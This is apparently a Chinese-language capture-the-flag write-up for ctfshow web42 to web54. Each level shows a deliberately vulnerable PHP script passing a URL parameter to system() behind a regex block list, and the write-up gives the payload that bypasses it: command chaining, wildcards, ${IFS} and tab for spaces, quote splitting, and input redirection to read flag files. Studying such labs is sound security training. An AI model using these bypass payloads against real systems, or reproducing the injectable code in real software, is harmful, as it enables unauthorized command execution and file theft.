文章目录
web42
<?php if(isset($_GET['c'])){ $c=$_GET['c']; system($c." >/dev/null 2>&1"); }else{ highlight_file(__FILE__); }
题目分析:
这段 PHP 脚本是一个简单的 web shell,它允许通过 URL 参数 c
执行系统命令。如果 c
参数被设置,脚本将使用 system()
函数执行传入的命令,并将输出重定向到 /dev/null
,这意味着命令的输出将被丢弃,不会显示给用户。如果 c
参数没有被设置,脚本将使用 highlight_file()
函数高亮显示当前脚本文件的内容。
这里是脚本的逐行解释:
<?php
:这是 PHP 代码的开始标记。if(isset($_GET['c'])){
:检查 URL 中是否有c
参数。$c=$_GET['c'];
:如果存在c
参数,将其值赋给变量$c
。system($c." >/dev/null 2>&1");
:执行变量$c
中的命令,并重定向标准输出和标准错误输出到/dev/null
。}else{
:如果c
参数不存在,执行下面的代码块。highlight_file(__FILE__);
:显示当前脚本文件的内容,并高亮显示 PHP 代码。}
:结束else
代码块。?>
:这是 PHP 代码的结束标记。
system($c." >/dev/null 2>&1");
具体解释
在 PHP 中,system()
函数用于执行一个命令并输出结果。这个函数的典型用法是:
system($command, &$output);
其中 $command
是要执行的命令字符串,$output
是一个变量,用于存储命令的输出。
在代码片段中:
system($c." >/dev/null 2>&1");
这行代码执行了以下操作:
$c
是从 URL 参数c
获取的值。这意味着如果有人访问这个脚本并提供了一个c
参数,比如c=ls
,那么$c
的值将是ls
。$c." >/dev/null 2>&1"
将$c
与重定向操作符连接起来。这里的重定向操作符有两个部分:>/dev/null
:这将命令的标准输出(stdout)重定向到/dev/null
,这是一个特殊的文件,用于丢弃所有写入到它的数据。这相当于在命令行中使用>/dev/null
。2>&1
:这将命令的标准错误(stderr)重定向到标准输出(stdout)。由于标准输出已经被重定向到/dev/null
,因此标准错误也会被丢弃。
system()
函数执行由$c
和重定向操作符组成的命令串。由于使用了重定向,命令的输出和错误都不会显示在浏览器中,也不会保存在任何地方。
举例说明:
假设有如下的 URL 访问:
http://example.com/script.php?c=ls
在这个例子中,$c
的值将是 ls
,所以 system()
函数将执行以下命令:
ls >/dev/null 2>&1
这将在服务器上列出当前目录的内容,但由于使用了重定向,这些内容不会被显示给用户,也不会保存在任何地方。
黑洞(/dev/null)
解释:
在 Unix 和类 Unix 系统中,/dev/null
是一个特殊的文件,它被称为“黑洞”,因为它会丢弃所有写入它的数据。这相当于一个数据的“下水道”,任何发送到 /dev/null
的数据都会被永久删除,不会有任何输出。
以下是一些关于 /dev/null
的说明:
丢弃数据:当你执行一个命令,并将输出重定向到
/dev/null
,比如command > /dev/null
,这意味着命令的输出将不会被显示或保存。安静运行:如果一个命令会产生大量输出,但你不需要这些输出,你可以使用
/dev/null
来让命令“安静”地运行。错误处理:除了重定向标准输出到
/dev/null
,你还可以将标准错误重定向到同一个地方,使用2>&1 > /dev/null
。这样,命令的错误信息也会被丢弃。日志记录:在某些情况下,你可能想要运行一个脚本或程序,但又不希望它生成日志文件。通过将输出重定向到
/dev/null
,你可以避免生成日志。测试:在开发和测试过程中,如果输出不是必需的,使用
/dev/null
可以简化测试过程,专注于其他方面。安全性:虽然
/dev/null
本身不涉及安全性问题,但使用它来丢弃可能包含敏感信息的输出可以避免潜在的安全风险。环境变量:在 shell 脚本中,
/dev/null
有时被用作环境变量,以确保命令不会影响输出。系统调用:在编程中,
/dev/null
可以作为系统调用的目标,比如在 C 语言中使用open("/dev/null", "w")
打开一个文件描述符,用于写入数据。
总之,/dev/null
是一个用于丢弃数据的特殊文件,它在 Unix 和类 Unix 系统中广泛使用,以简化命令行操作和提高脚本的灵活性。
payload:
?c=tac flag.php;ls
payload解释:
采用双写绕过?c=tac flag.php;ls
这里呢,是把分号后面的ls
写到黑洞里面去了,第一个tac
就逃出来了
flag:
ctfshow{505e7f24-823d-4dd4-96f1-2edcdcc4877a}
web43
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat/i", $c)){ system($c." >/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }
题目解析:
这个相比上题,过滤了分号
除了分号,还可以用&&
要url编码后使用 %26%26
payload:
?c=tac flag.php%26%26ls
flag:
ctfshow{3ff43859-a599-4f16-bcb4-957d4c22a578}
web44
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/;|cat|flag/i", $c)){ system($c." >/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }
题目解析:
- 这题多过滤了flag
- 可以使用通配符绕过
- 通配符有
*
?
payload:
?c=tac fl?g.php%26%26ls ?c=tac fl*g.php%26%26ls
flag:
ctfshow{ad1f49da-357e-4b25-98ff-3fc1a0f48820}
web45
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat|flag| /i", $c)){ system($c." >/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }
题目解析:
多过滤了空格,url编码的空格也被过滤了
如果过滤了空格,可以使用:
<> %20(space) %09(tab)
payload:
?c=tac%09fla?.php%26%26ls
flag:
ctfshow{750bf5e9-71c6-4bf8-beb4-b026c0570fbc}
web46
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){ system($c." >/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }
题目解析:
- 对比上一题,把数字也过滤了,还有
$
、*
这两个符号
payload:
?c=tac%09fla?.php%26%26ls
flag:
ctfshow{9b5a8f1e-f342-40f4-b6a8-81d777d0c9ba}
web47
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){ system($c." >/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }
题目解析:
多过滤了几个查看文件的命令
Linux查看文件命令:
cat tac more less head tail nl tailf
payload:
?c=tac%09fla?.php%26%26ls
flag:ctfshow{37269e44-8e76-485c-a966-54a52da88cfd}
web48
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){ system($c." >/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }
题目解析:
- 又多过滤了几个读取文件的命令
payload:
?c=tac%09fla?.php%26%26ls
flag:
ctfshow{570f034a-31d9-4a80-91f6-bc761734dabe}
web49
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){ system($c." >/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }
题目解析:
- 多过滤了
%
%09
的%
会被解析成制表符,不算做%
payload:
?c=tac%09fla?.php%26%26ls
flag:
ctfshow{233ec2aa-440f-48dc-8548-9689626fc10d}
web50
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){ system($c." >/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }
题目解析:
这个把09和26过滤了,之前的方法就不可以了。得想新不用空格的方法了
使用nl带行号
?c=nl<flag.php||ls
nl
命令:nl
是一个用于添加行号到文本文件的命令。它通常用于给文本文件的每一行添加行号,以便于引用和阅读。- 重定向:
<
是一个输入重定向操作符,它允许将文件的内容作为命令的输入。
把||进行url编码%7C%7C
flag绕过是采用中间加两个单引号,两个单引号分割字符串执行的时候会被忽略
payload:
?c=nl<fla''g.php%7C%7Cls
flag:
按F12查看
ctfshow{f6ef33bf-57ea-4e5d-aa1f-726595652bf6}
web51
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){ system($c." >/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }
题目解析:
- 多过滤了一个tac
payload:
?c=nl<fla''g.php%7C%7Cls
flag:
ctfshow{0581c93f-a53f-44d4-8d74-83397bfc7b96}
web52
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c." >/dev/null 2>&1"); } }else{ highlight_file(__FILE__); }
题目解析:
- 这个把<>也过滤了,上面的方法是不行了,但是把$符号放出来了
- 空格就可以使用
$IFS$9
,$IFS
,${IFS}
来绕过了
payload:
?c=nl${IFS}fla''g.php%7C%7Cls
回显:$flag="flag_here";
查看根目录文件
?c=ls${IFS}/%7C%7Cls
回显:bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var
ls -l
查看flag详细信息
?c=ls${IFS}-l${IFS}/%7C%7Cls
回显:flag drwxr-xr-x
查看flag文件
?c=nl${IFS}/fla''g%7C%7Cls
flag:
ctfshow{3123e5da-6eb9-44e6-a309-117bb87aba88}
web53
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){ echo($c); $d = system($c); echo "<br>".$d; }else{ echo 'no'; } }else{ highlight_file(__FILE__); }
题目解析:
echo($c);
是输出GET传入的参数$d = system($c);
是执行c的语句后得到的东西赋值给decho "<br>".$d;
是换行后在输出d的内容echo 'no';
是if判断错误的话会输出no
payload:
先查看一下目录
?c=ls${IFS}
回显:
ls${IFS}flag.php index.php readflag readflag
直接查看flag.php
?c=nl${IFS}fla''g.php
回显:flag
flag:
ctfshow{d2bc773c-85e5-44cb-b04b-eabc11b12d58}
web54
<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); }
题目解析:
- 完全禁用了这些命令
- 对flag.php的构造可以这样:
fl??.???
甚至可以简化为:????????
同样,命令也可以进行构造 cat可以构造为?at
、c??
payload:
这里的/bin/是指bin目录下检索c??,不然在当前目录是没有这个命令的
?c=/bin/c??${IFS}????????
另外grep命令可以才文件中查找含有的字符串 形式:grep [字符串] [filename]
?c=grep${IFS}ctfshow${IFS}????????
重命名文件也可以
?c=mv${IFS}fl??.???${IFS}a.txt
访问a.txt即可
flag:
ctfshow{f5404f94-7a53-46ee-9153-f9132349bb47}